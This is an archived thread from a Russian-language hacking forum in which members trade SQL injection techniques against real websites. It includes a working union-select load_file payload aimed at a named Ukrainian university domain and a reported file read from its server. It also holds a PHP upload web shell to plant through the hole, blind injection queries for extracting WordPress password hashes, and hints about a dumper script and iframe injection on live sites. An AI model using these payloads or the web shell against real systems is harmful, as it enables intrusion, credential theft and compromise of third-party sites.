ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.10.2009, 05:17
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2F686F6D652F736E616B6 52F756E6976642F756E6976642F646F63756D656E742F696E6 465782E706870),2,3,4,5--+
прочитал : /home/snake/univd/univd/document/index.php
Код:
include ($path_pars . 'structure/tools_st.inc');
http://www.univd.edu.ua/structure/tools_st.inc
Код:
include ($path_pars .'serverdb.inc')
|
|
|
25.10.2009, 09:03
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Strilo4ka
возможно ли найти PHPMyAdmin интересно, есть какие нить програмы что его ищут!!!???
http://google.ru/
site:домен_жертвы phpmyadmin
Если админ норм, то ненайдёшь, посмотри у хостера.
|
|
|
|
25.10.2009, 12:06
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Простенький сканер каталога phpMyAdmin
Код:
http://dumpz.org/13615/
|
|
|
|
25.10.2009, 12:23
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
+ часто бывает пхп админ прячут на нулевом домене,тут только реверс айпи поможет(как повезет)
Strilo4ka тут больше соображалка играет роль,и нормальный словарь директорий
может поможет
univd.edu.ua/dumper/dumper.php
Последний раз редактировалось Shadrin; 25.10.2009 в 12:29..
|
|
|
|
25.10.2009, 12:24
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
Сообщение от Scipio
пользуй into dumpfile а не into outfile
Я пробую на локалке у себя, у меня всё пашет, а когда уже на удаленке, то ошибка выскакивает, хотя запрос тотже,
#1064 - You have an error in your SQL syntax near '' at line 1
Сообщение от _gr34t
M1ks, если file_upload=On, то можно намного проще сделать.
Заливаешь через свою уязвимость
PHP код:
<?php if($_FILES[upfile]){if(!move_uploaded_file($_FILES[upfile][tmp_name], $_FILES[upfile][name]))die();}?><form method=POST enctype=<?php echo chr(39);?>multipart/form-data<?php echo chr(39);?>><input type=file name=upfile><input type=Submit></form>
И заливаешь любой файл со своего компа
Там походу офф, неработает чегото
|
|
|
|
25.10.2009, 13:59
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
Когда делаю ифрейм,на сайте появляется ошибка -Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homez.194/fromagero/www/includes/defines.php:3) in /homez.194/**/www/libraries/joomla/session/session.php on line 423
Последний раз редактировалось 2Fed123; 25.10.2009 в 14:02..
|
|
|
|
25.10.2009, 16:43
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от _gr34t
И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*
Как тут можно получить пароль из wp_users?
---
Вопрос снят. Ответ - Никак  погоди с выводами.
таблица "wp_users" имеет поле :
user_pass(по дефолту),если найденная тобой скуля работает с таблице пользователей =>подбирай колонку с паролем пользователя, а затем и сам пароль.
колонку с паролем:
Код:
profile.php?id=2+and+length(user_pass)>0
пароль:
Код:
id=2+and+ascii(substring(user_pass,1,1))>127
^Посимвольным перебором.
вот замечательная статья Grey'a - Работа с инъекциями в MySQL третьей версии.
|
|
|
|
25.10.2009, 16:51
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Сообщение от M1ks
Я пробую на локалке у себя, у меня всё пашет, а когда уже на удаленке, то ошибка выскакивает, хотя запрос тотже,
#1064 - You have an error in your SQL syntax near '' at line 1
Там походу офф, неработает чегото
Зри конфиг пхн, наверняка у тебя на локалке magic_quotes=off, а на удаленке - ON.
|
|
|
|
25.10.2009, 16:58
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
млин, и че же делать..
|
|
|
|
25.10.2009, 17:04
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Искать другие способы загрузки файка. Кавычки экранизируются, заюзать инто оутфайл и инто дампфайл не выйдет. Прийдется искать либо админку, если есть возможность залить с нее - все ок, если нет - ищи другие баги, но не факт, что найдешь..
Последний раз редактировалось Ins3t; 25.10.2009 в 17:06..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
